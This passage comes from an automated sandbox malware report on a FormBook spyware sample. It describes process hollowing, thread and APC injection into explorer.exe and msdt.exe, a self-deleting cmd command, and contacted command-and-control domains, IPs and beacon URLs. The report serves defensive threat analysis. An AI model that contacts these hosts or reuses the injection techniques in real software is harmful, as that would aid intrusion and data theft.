          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05098B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0507D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05095BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05004A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05004A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05054257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0507B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0507B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05098A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0500927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.99.91 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.128.23.153 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.29.215.252 80
          Source: C:\Windows\explorer.exeNetwork Connect: 69.30.217.211 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeMemory written: C:\Users\user\Desktop\SKM_C36821010708320.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: B60000
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess created: C:\Users\user\Desktop\SKM_C36821010708320.exe C:\Users\user\Desktop\SKM_C36821010708320.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe'
          Source: explorer.exe, 00000003.00000002.566052571.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000000.237897500.0000000001980000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.568458380.0000000003790000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.237897500.0000000001980000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.568458380.0000000003790000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.237897500.0000000001980000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.568458380.0000000003790000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.237897500.0000000001980000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.568458380.0000000003790000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeQueries volume information: C:\Users\user\Desktop\SKM_C36821010708320.exe VolumeInformation
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing12Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 339379 Sample: SKM_C36821010708320.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 7 other signatures 2->42 10 SKM_C36821010708320.exe 3 2->10         started        process3 file4 28 C:\Users\user\...\SKM_C36821010708320.exe.log, ASCII 10->28 dropped 52 Tries to detect virtualization through RDTSC time measurements 10->52 54 Injects a PE file into a foreign processes 10->54 14 SKM_C36821010708320.exe 10->14         started        signatures5 process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Sample uses process hollowing technique 14->60 62 Queues an APC in another process (thread injection) 14->62 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.bhscsh.com 69.30.217.211, 49748, 80 WIIUS United States 17->30 32 sheilataman.com 103.29.215.252, 49749, 80 SENTRACOLO-AS-IDSentraNiagaSolusindoPTID Indonesia 17->32 34 5 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 msdt.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SKM_C36821010708320.exe28%ReversingLabsByteCode-MSIL.Spyware.Noon
          SKM_C36821010708320.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.SKM_C36821010708320.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.bhscsh.com/6bu2/?_FNlYB=C+zDmV11Q+D9r33XVeqR5IBXFKX0BTJmu/S+z/bMoWLqgljoX+qokl8zdBgJjJlA7MT1&qRu=rTvtaraPvhs450%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.o-tanemaki.com/6bu2/?_FNlYB=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxRUrH62O+cU&qRu=rTvtaraPvhs450%Avira URL Cloudsafe
          http://www.ehealthla.com/6bu2/?_FNlYB=94KbLiUgY8wWwYGUmiNR7bnZsaGPnSdzNXNbmna93NLOwX7qMp/QzDnFT9WUG3fulNFR&qRu=rTvtaraPvhs450%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.idahofallsobituaries.com/6bu2/?_FNlYB=kQfR6oHqf1829R+dk89CbQkI6JsDf2kbL2dewoZCGSm5OfzNJ+nKnG9aqB78Y+EDmzvg&qRu=rTvtaraPvhs450%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.sheilataman.com/6bu2/?_FNlYB=JImKQCKfXzlBTYBvNEy/gJkFfNV1GdJ9tkN4E9b1C6xzootmnG8qxQeaBWCQRAMh80Yn&qRu=rTvtaraPvhs450%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.bhscsh.com
          69.30.217.211
          truetrue
            unknown
            www.ehealthla.com
            52.128.23.153
            truetrue
              unknown
              www.o-tanemaki.com
              118.27.99.91
              truetrue
                unknown
                idahofallsobituaries.com
                34.102.136.180
                truetrue
                  unknown
                  sheilataman.com
                  103.29.215.252
                  truetrue
                    unknown
                    www.idahofallsobituaries.com
                    unknown
                    unknowntrue
                      unknown
                      www.sheilataman.com
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.bhscsh.com/6bu2/?_FNlYB=C+zDmV11Q+D9r33XVeqR5IBXFKX0BTJmu/S+z/bMoWLqgljoX+qokl8zdBgJjJlA7MT1&qRu=rTvtaraPvhs45true
                        • Avira URL Cloud: safe
                        unknown
                        http://www.o-tanemaki.com/6bu2/?_FNlYB=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxRUrH62O+cU&qRu=rTvtaraPvhs45true
                        • Avira URL Cloud: safe
                        unknown
                        http://www.ehealthla.com/6bu2/?_FNlYB=94KbLiUgY8wWwYGUmiNR7bnZsaGPnSdzNXNbmna93NLOwX7qMp/QzDnFT9WUG3fulNFR&qRu=rTvtaraPvhs45true
                        • Avira URL Cloud: safe
                        unknown
                        http://www.idahofallsobituaries.com/6bu2/?_FNlYB=kQfR6oHqf1829R+dk89CbQkI6JsDf2kbL2dewoZCGSm5OfzNJ+nKnG9aqB78Y+EDmzvg&qRu=rTvtaraPvhs45true
                        • Avira URL Cloud: safe
                        unknown
                        http://www.sheilataman.com/6bu2/?_FNlYB=JImKQCKfXzlBTYBvNEy/gJkFfNV1GdJ9tkN4E9b1C6xzootmnG8qxQeaBWCQRAMh80Yn&qRu=rTvtaraPvhs45true
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                          high
                          http://www.fontbureau.comexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                            high
                            http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.tiro.comexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.goodfont.co.krexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.carterandcone.comlexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.typography.netDexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://fontfabrik.comexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
